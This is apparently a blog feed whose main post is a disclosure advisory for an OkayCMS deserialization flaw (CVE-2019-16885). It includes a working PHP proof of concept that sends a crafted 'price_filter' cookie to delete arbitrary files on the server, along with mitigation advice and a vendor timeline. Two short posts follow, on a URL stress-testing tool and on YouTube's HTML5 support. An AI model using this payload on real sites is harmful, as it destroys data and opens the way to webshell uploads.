Web https://tech.feedyourhead.at/ en OkayCMS: Unauthenticated remote code execution https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms <span class="field field--name-title field--type-string field--label-hidden">OkayCMS: Unauthenticated remote code execution</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20191129-01<br /> Target: OkayCMS<br /> Vendor: OkayCMS<br /> Version: all versions including 2.3.4<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16885">CVE-2019-16885</a><br /> Accessibility: Local<br /> Severity: Critical<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://okay-cms.com/">OkayCMS is a simple and functional content managment system for an online store.</a></p> <h4>Vulnerability Description</h4> <p>An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in “<em>view/ProductsView.php</em>” using the cookie "price_filter" or in “<em>api/Comparison.php</em>” via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in “<em>api/Comparison.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$items</span> <span style="color: #339933;">=</span> <span style="color: #339933;">!</span><a href="http://www.php.net/empty"><span style="color: #990000;">empty</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> ? <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> <a href="http://www.php.net/array"><span style="color: #990000;">array</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <p>The unsafe deserialization also occurs in “<em>view/ProductsView.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$price_filter</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'price_filter'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <h4>Proof of Concept</h4> <p>The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$argc</span> <span style="color: #339933;">!=</span> <span style="color: #cc66cc;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <span style="color: #0000ff;">&quot;usage: <span style="color: #006699; font-weight: bold;">$argv[0]</span> &lt;url&gt; &lt;file&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/exit"><span style="color: #990000;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$url</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_CacheResource_File <span style="color: #009900;">&#123;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> releaseLock<span style="color: #009900;">&#40;</span>Smarty <span style="color: #000088;">$smarty</span><span style="color: #339933;">,</span> Smarty_Template_Cached <span style="color: #000088;">$cached</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">false</span><span style="color: #339933;">;</span> <span style="color: #339933;">@</span><a href="http://www.php.net/unlink"><span style="color: #990000;">unlink</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Template_Cached <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$handler</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$lock_id</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$GLOBALS</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_CacheResource_File<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cache_locking</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_Template <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$smarty</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cached</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty<span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Template_Cached<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __destruct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cache_locking</span> <span style="color: #339933;">&amp;&amp;</span> <a href="http://www.php.net/isset"><span style="color: #990000;">isset</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">releaseLock</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">,</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$obj</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_Template<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$serialized</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/serialize"><span style="color: #990000;">serialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$obj</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$un</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$headers</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span> <span style="color: #0000ff;">'Accept-Language: en-US,en;q=0.5'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Referer: <span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'Cookie: '</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">'price_filter='</span> <span style="color: #339933;">.</span> <a href="http://www.php.net/urlencode"><span style="color: #990000;">urlencode</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">';'</span> <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$curl</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_init"><span style="color: #990000;">curl_init</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/curl_setopt_array"><span style="color: #990000;">curl_setopt_array</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #339933;">,</span> <span style="color: #009900;">&#91;</span> CURLOPT_HTTPHEADER <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$headers</span><span style="color: #339933;">,</span> CURLOPT_RETURNTRANSFER <span style="color: #339933;">=&gt;</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">,</span> CURLOPT_URL <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">&quot;<span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki/sort-price&quot;</span><span style="color: #339933;">,</span> CURLOPT_USERAGENT <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'</span> <span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$resp</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_exec"><span style="color: #990000;">curl_exec</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.php.net/curl_close"><span style="color: #990000;">curl_close</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">print</span> <span style="color: #000088;">$resp</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div> <h4>Notes</h4> <p>Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.</p> <h4>Vulnerable Versions</h4> <p>All versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.</p> <h4>Tested Versions</h4> <p>OkayCMS-Lite 2.3.4</p> <h4>Impact</h4> <p>An unauthenticated attacker could upload a webshell to the server and execute commands remotely.</p> <h4>Mitigation</h4> <p>At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.</p> <h4>Vendor Contact Timeline</h4> <p>2019-08-29Contacting the vendor</p> <p>2019-09-04Vendor replied</p> <p>2019-09-17Vendor released commercial version 3.0.2 including a bugfix</p> <p>2019-09-29Public disclosure</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms">https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=284&amp;2=comment&amp;3=comment" token="GjVmaskhE-AMvP5dALObfK4_-KKa7f-L1OICRNPKZFg"></drupal-render-placeholder> </section> Mon, 02 Dec 2019 18:25:19 +0000 Hoti 284 at https://tech.feedyourhead.at Simple WebApp-Stress-Tool https://tech.feedyourhead.at/content/simulty <span class="field field--name-title field--type-string field--label-hidden">Simple WebApp-Stress-Tool</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I wrote a simple webapp-stress-tool. <a href="https://github.com/whotwagner/simulty">Simulty</a> is a very simple webapp-stress-tool. It reads random urls from a file and executes multiple get-requests simultaneously to them.</p> <h2>Download:</h2> <pre> <code> git clone https://github.com/whotwagner/simulty </code></pre> <h2>Usage:</h2> <p>Create a file with one url per line and start the stresstest with:</p> <pre> <code> ./simulty.rb <urlfile> <number-of-threads> </number-of-threads></urlfile></code></pre> <h2>Sample-Urlfile:</h2> <pre> <code> http://www.somefoobar.com/index.php?fun https://www.somefoobar.com/user/login.php http://www.somefoobar.com/whatever/somewhere/over/the/rainbow.php </code></pre> <p>Tip: This Urlfile could be generated from a logfile.</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Apr 22 2016</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/ruby" hreflang="en">Ruby</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/network" hreflang="en">Network</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/97" hreflang="en">Toscom</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=177&amp;2=comment&amp;3=comment" token="PTQEqErQeUkRAVDafW9aRuz25ARuUyrr5dGbKFPfnqI"></drupal-render-placeholder> </section> Fri, 22 Apr 2016 10:25:55 +0000 Hoti 177 at https://tech.feedyourhead.at Youtube with HTML5 https://tech.feedyourhead.at/content/youtube-html5 <span class="field field--name-title field--type-string field--label-hidden">Youtube with HTML5</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><a href="http://www.youtube.com/html5">Youtube works now with html5</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Feb 20 2015</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/youtube" hreflang="en">Youtube</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=55&amp;2=comment&amp;3=comment" token="mM0Cn9yvUzORtYKQR-rcHJlxl8KK8q6GLG5hTXT5ETQ"></drupal-render-placeholder> </section> Thu, 19 Feb 2015 23:08:40 +0000 Hoti 55 at https://tech.feedyourhead.at